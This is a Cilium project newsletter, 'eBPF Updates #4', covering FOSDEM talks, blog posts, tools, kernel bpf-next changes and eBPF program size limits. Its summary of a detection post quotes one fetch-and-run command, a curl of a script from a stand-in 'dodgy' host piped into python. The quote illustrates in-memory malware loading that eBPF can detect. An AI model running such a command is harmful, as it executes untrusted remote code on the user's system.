Pre-register now for eBPF Summit 2021 on August 18-19
February 23, 2021

Title iconeBPF Updates #4: In-Memory Loads Detection, Debugging QUIC, Local CI Runs, MTU Checks, but No Pancakes

Table of Contents

    In several parts of the globe, February is traditionally about love, and pancakes. eBPF sure received a lot of love over the last weeks! Blogging, conferencing, and kernel development have resumed full speed after the quiet period at the end of the year. Here are all the latest updates, plus a section focusing on program size limits. Alas, uncertainty remains as for eBPF getting pancakes.

    New Resources

    Besides pancakes and Valentine's Day, early February is also marked by one of the biggest events centered on open-source: FOSDEM! This year's edition was held online, and included several presentations related to eBPF.

    • Advanced BPF kernel features for the container age, from Daniel Borkmann.
      eBPF is in a unique position to efficiently process and steer packets at different steps of their travel through the stack. Cilium relies on it to implement advanced networking features for cloud-native environments. After a brief reminder on the potential of eBPF, Daniel dives into three of those features: consistent service load-balancing for Kubernetes with XDP and Maglev, low-latency Pod fast-path through dedicated eBPF helpers to bypass iptables rules and other parts of the stack, and EDT (Earliest Departure Time) rate-limiting for Pods. Recommended if you want to learn more on advanced networking features entirely implemented with eBPF.
    • hXDP: Efficient Software Packet Processing on FPGA NICs, from Marco Spaziani Brunella.
      hXDP is an eBPF hardware offload implementation for FPGA-based NICs. Through hardware functions, some additional compiler work, and custom optimizations, it achieves great performance. Latest work include working on a higher-end platform, and trying to implement eight processing cores instead of one.
    • Networking Performances in the Linux Kernel, Getting the most out of the Hardware, from Maxime Chevallier.
      Definitely centered on networking, this presentation follows the path of packets through the low-level mechanisms involved in the hardware and in the Linux stack. There is not much about eBPF itself, but the last section of the talk helps understand how XDP and AF_XDP complement the other networking components in the kernel.
    • Monitoring MariaDB Server with bpftrace on Linux, from Valerii Kravchuk.
      This presentation is both an introduction to bpftrace itself and to its application to MariaDB tracing. The objective is to add uprobes, get stack traces, or inspect some specific components to trace and profile the MariaDB server in production. Benchmark results confirm that bpftrace performs better than pt-pmp or perf.
      Valerii also covered the topic in a series of posts on his blog.
    • Seccomp Notify on Kubernetes, from Alban Crequy.
      This talk demonstrates how to use seccomp notify to proxy some system calls—including bpf()— to the container manager, from an unprivileged container. Seccomp relies on cBPF (classic BPF) to filter system calls and take actions on them. Seccomp notify is a recent update where seccomp can return a file descriptor and hand it to another task, so that this task can analyze the data involved in the filtered system call and potentially emulate it from user space. Christian Brauner has written extensively about seccomp notify and the bpf() use case.
    • Deploying eBPF, XDP & AF_XDP for Cloud Native, from Dave Cremins and Gary Loughnane.
      As per the abstract, “This talk will cover an introduction to AF_XDP, why it is suited to cloud native microservices, how it can be deployed today and the deployment challenges as well as their solutions.” [We could not attend the presentation, and the video and slides have not been uploaded yet as of this writing].

    And then here are some resources published over the last weeks, independent from FOSDEM.

    • Running eBPF and Perf in Docker for Mac, from Peter Malmgren.
      Perf and eBPF tools are handy tools to trace processes and to pin down the origin of a performance bottleneck. Motivated by the need to identify the cause of a slowdown in a Docker container running on macOS, this post explains how to install the Linux headers, to compile BCC and bpftrace, and to run them in the container.
    • Debugging QUIC with H2O and QLog, from Toru Maesaka.
      The H2O HTTP server deployed by Fastly has a built-in event tracing infrastructure, powered by eBPF or DTrace depending on the platform. This post is not really about eBPF, but it presents an interesting use case of eBPF with USDT (probes for user space applications) to adapt QLog to the H2O server and get logs to debug and improve QUIC, a network protocol implemented in user space.
    • eBPF & the future of osquery on Linux (video), from Zach Wasserman.
      Osquery has been relying on the Audit subsystem in Linux to provide system visibility, which is powerful but comes with some drawbacks. For example, it supports a single consumer, making osquery conflict with the auditd daemon, and it lacks awareness of containers. eBPF can be used since osquery 4.6.0 as an alternative backend to collect data, circumventing these issues and coming with “a potential to dramatically increase scope of observability”.
    • eBPF Tools: An Overview of Falco, Inspektor Gadget, Hubble and Cilium, from Lucas Severo Alves.
      Here is an introduction to each of the four eBPF-based tools mentioned in the title, accompanied with example use cases. All these tools focus on cloud-native environments, so this post provides a good overview of the eBPF landscape in the cloud, and of the different issues it addresses in terms of security, tracing, visibility, and networking.
    • Datadog On eBPF (video), from Lee Avital, Guillaume Fournier and Ara Pulido.
      Various aspects of eBPF are covered in this presentation. After introducing the basics, Datadog discusses technical details related to their workflow: Is it better to guess the offset of kernel structures or to rely on runtime compilation? They also describe two of their use cases for eBPF, network monitoring and runtime security.
    • A Beginner's Guide to eBPF with Go (PDF), from Liz Rice.
      Learn how to program with eBPF and Go with this accessible tutorial. After a reminder of the basics of eBPF, this presentation focuses on a simple tracing example with bpftrace. Then it explains how to write a first “Hello, World!” program with eBPF and the libbpfgo Go bindings for the libbpf C library, before showing how to recreate the bpftrace command previously introduced.
    • Using eBPF to uncover in-memory loading, from Pat H.
      Tracing with eBPF can be adapted to nearly any use case. In this post, programs are attached to trace the calls to dup2(), write() and read(), in order to detect when two process are sharing information through a bash pipe (|). The objective of the experiment is to detect commands constructed like this: curl https://dodgy.com/loader.py | python -, where a rogue process attempts in-memory loading of a malware. The post contains a refresher on how writing to and reading from pipes work on Linux, making it easy to understand and follow where the eBPF programs are attached.

    Software Projects

    • The new https://editor.cilium.io/ is a NetworkPolicy editor, introduced by the Cilium community as an easy and interactive way to learn, create, visualize, and share Kubernetes NetworkPolicies. It provides an intuitive overview of some of the features that Cilium implements with eBPF. More details are available in the editor's announcement.
    • Tracee version 0.5.0 is out. From a tracing command line tool, the project evolves into a runtime security solution and now encompasses tracee-ebpf—the command-line tool itself—and the libbpfgo library. It also includes tracee-rules, a “new rule engine to process tracee-ebpf's events and detects suspicious behavior based on built-in and user-defined 'signatures'”, which are defined in Open Policy Agent's Rego language or in Go.
    • TCPDog is a new tool to collect TCP statistics with eBPF and to export them to an Elasticsearch or InfluxDB database. It can collect from all TCP-related kernel tracepoints at the same time, but the parameters to collect are configurable.

    Software: Demos and Experiments

    • Guardicore released IPCDump for tracing interprocess communications on Linux, be it through pipes, FIFOs, signals, UNIX sockets, loopback-based networking, or pseudoterminals. It draws some inspiration from Windows's procmon. Internally, it uses the gobpf library that provides Go bindings for the BCC framework. See also the announcement post for more details, with a few examples of tracing communication from Chrome events, or between processes like containerd and dockerd.
    • Liz Rice has published a set of basic eBPF examples using libbpfgo. The eBPF program is trivial, the objective is to get familiar with libbpfgo, a set of bindings in Go to the libbpf C library.
    • XDP minimal example is a note from Peter Ruderich describing a small but standalone XDP example, with a few explanations and pointers. This is an interesting program to get started with XDP (but don't forget the XDP tutorial).
    • BPF-UprobeDBG is a proof-of-concept experiment showing how to send signals to a process from a uprobe tracing a function of that same process. If that process is being debugged in gdb for example, this will stop its execution and allow for close inspection as well as step-by-step debugging. The eBPF program is responsible for computing the precise conditions under which the improvised breakpoint should trigger.

    Podcasts

    • Break Things on Purpose | Mikolaj Pawlikowski, Engineering Lead at Bloomberg, interview from Jason Yee and Pat Higgins.
      Centered on Chaos Engineering, this episode mentions eBPF as “a game changer” in terms of visibility. The technology uses small code snippets, has a low overhead, but allows for unprecedented inspection and metrics gathering, most of the time without the traced application knowing anything about visibility.

    Members of the Cilium community have been very active, and contributed to several podcasts on eBPF and Cilium over the last weeks:

    • The Weekly Squeak - eBPF Cloud Native computing with Neela Jacques of Isovalent, interview from Chris Chinchilla.
      By operating from inside the kernel, eBPF offers unprecedented capabilities in terms of tracing and network processing. This allows Cilium and then Isovalent to propose powerful solution to address both the networking and security aspects for containerized workflows, in particular in a context where security requirements have been evolving a lot over the few years, and where securing only at the perimeter is no longer an option. eBPF brings all this, Neela explains, and makes it scale efficiently.

    The Kernel Side

    Here is a summary of the main changes included in the second pull request for the bpf-next tree for the 5.12 cycle.

    • Add a script to run the eBPF CI locally. It was already possible to build and run the eBPF selftests locally, but this script runs them on the same kernel image as the continuous integration frameworks that validates the patch sets on their submission. The objective is to have contributors run the selftests on their machine but in the same environment as the CI, to check for regressions and reduce the back-and-forth between maintainers and developers. If you send patches to the bpf or bpf-next trees, take note! (KP Singh, link)
    • Support passing pointers to types with known size as arguments to a global function. The objective is to overcome the limit on the maximum number of allowed arguments for eBPF functions (five arguments): Additional arguments can be stored in a struct, and a pointer to this struct passed to the function. The struct can contain pointers, but they cannot be dereferenced in the callee. Passing pointers is not supported for static functions (The distinction between global and static functions is conveyed by the BTF information loaded alongside the program). (Dmitrii Banshchikov, link)
    • Add an eBPF iterator for task_vma which allows the user to generate information similar to what is available from /proc/pid/maps, but customized for their needs. For example, when a VMA (Virtual Memory Area) covers mixed 2MB pages and 4kB pages, one use case is to indicate which address ranges are backed by 2MB pages. (Song Liu, link)
    • Allow bpf_getsockopt() and bpf_setsockopt() helpers from all sock_addr-related program hooks, so that listener sockets attached to cgroups can query or modify socket options as needed at the various available attach points. (Stanislav Fomichev, link)
    • In a set containing various improvements, Alexei adds a mechanism to prevent recursion on fentry/fexit programs (extendable to sleepable programs in the future). A recursion would occur, for example, when tracing a function called by an eBPF helper, with a program that would itself call that helper. Other patches in the set also enable the use of “map-in-map” and per-CPU maps, as well as statistics, for sleepable programs (A few tracing programs and eBPF LSM programs can request, at load time, to be sleepable in order to call helpers requiring the ability to sleep). (Alexei Starovoitov, link)
    • Support the use of eBPF ring buffers for sleepable programs. (KP Singh, link)
    • Extend the verifier to enable variable offset read and write access to the eBPF program stack. For example, if a stack-allocated array is declared in a program, it becomes possible (under certain conditions) to read from or write to a cell at an index which is not statically known at compile and load time, but only determined at runtime. (Andrei Matei, link)
    • Rework MTU handling in TC and XDP programs. MTU (Maximum Transmission Unit) checks performed by the eBPF helpers would sometimes be too conservative in preventing growing the size of a packet, because they would not consider the possibility of a redirection and would look at the MTU for the wrong interface. This set lifts some of the limitations, and adds a new bpf_check_mtu() helper to allow eBPF programs to query a device's MTU and run the check themselves. (Jesper Dangaard Brouer, link)
    • Extend the bpf_get_socket_cookie() helper to make it available from tracing programs, including sleepable ones. (Florent Revest, link)
    • Clean up and slightly improve the performance for AF_XDP sockets. Also add a probe to libbpf (but it should be moved to libxdp in the future) to check what features the kernel supports, and pick the most efficient eBPF program to load from the library when setting up the socket. (Björn Töpel, link)
    • Allow BTF to contain information on zero-sized .rodata ELF sections. Such sections may be formed by certain read-only (const) initialized variables, that the compiler stores into the .rodata as global variables. Because the variable was not initially declared as global, there is no debug information to store in the BTF information for that section. (Yonghong Song, link)
    • Improve XDP performance for the veth by allocating socket buffers in bulks for ndo_xdp_xmit(). (Lorenzo Bianconi, link)

    Did You Know? Program size limit

    Do you know what is the maximum size of an eBPF program? You may have heard of programs limited to 4k instructions, but this has changed some time ago.

    One particularity of eBPF programs, enforced at load time by the kernel verifier, is that they must run and eventually terminate within a relatively short delay. Allowing for long runs would slow down the kernel too much. Permitting users to run arbitrary programs, possibly containing infinite loops, could even hang the kernel completely.

    To avoid that, the verifier builds the direct acyclic graph (DAG) representing the possible paths of execution in the program, and ensures that each one leads to termination. Sometimes, some branches “overlap” between several paths, and under certain conditions the verifier can skip verifying them after the first occurrence. This is called “state pruning”. Without this mechanism, the number of instructions to validate would be too high and slow down program loading beyond what is acceptable.

    When eBPF was introduced, there were two parameters that would limit its size:

    • The maximum number of instructions for a program: 4096
    • The complexity limit: 32768

    The second number represents the number of instructions that the verifier is allowed to check before forfeiting the verification and rejecting the program. You may think of it as “the total number of instructions cumulated over all the execution paths, minus those on branches that the verifier is able to prune”. So if a program had many logical branches and would require too much effort from the verifier, it would fail to load, even if it had fewer than 4096 instructions.

    But both limits were changed1 in a commit in Linux 5.2. The complexity limit was raised to one million verified instructions. As for the maximum limit of instructions, it simply disappeared, meaning that the size of program is now limited by the complexity induced by their verification. There is still a de facto hard limit at one million instructions, for a program that would have a single logical branch (no “if” and comparisons anywhere). In practice, such program would be of little interest. Programs have branches, their verification is more complex, and their allowance for instructions decreases accordingly.

    The 4096-instruction limit did not, in fact, disappear entirely. The kernel still enforces it for programs loaded by non-root users (more precisely, users without CAP_SYS_ADMIN or, starting with Linux 5.8, CAP_BPF).

    eBPF programs tend to be small, and the one-million-state complexity limit is big enough that most use cases will never hit it. Some advanced projects using eBPF to implement more complex features may be facing it, and Cilium for example is regularly adjusting to satisfy the verifier's requirements. Some ways to work around complexity may include the use of tail calls and bounded loops (introduced in Linux 5.3), or reorganizing the code in such a way that the number of branches decreases or that the verifier can prune them more efficiently.

    Hardware offload is yet another story, and has entirely different constraints since the program must fit into the hardware's memory. The bound is set as much by the verifier as by the hardware's capacity, with the efficiency of bytecode generation and then of the JIT-compiler both playing a role.

    The new, one-million-state complexity limit should be flexible enough for most use cases, and in the end, programs have truly one bound: Your imagination!

    Community

    The eBPF community keeps growing!

    However, one of the challenges that remain is apparently to find enough time to start working with eBPF.

    Now we only miss a tweet about eBPF and pancakes.

    Credits

    eBPF Updates are brought to you by the Cilium project. This report was produced by Quentin Monnet (Isovalent). Thanks to Cilium engineering team for input and reviews.

    If you would like to submit contributions for the next report, please submit them via the #ebpf-news channel on eBPF Slack.


    1. The complexity limit was actually changed several times since the 32k value from its introduction in Linux 3.18: it was raised to 64k in Linux 4.7, then to 96k in Linux 4.12, again to 128k in Linux 4.14, and at last to 1M in Linux 5.2.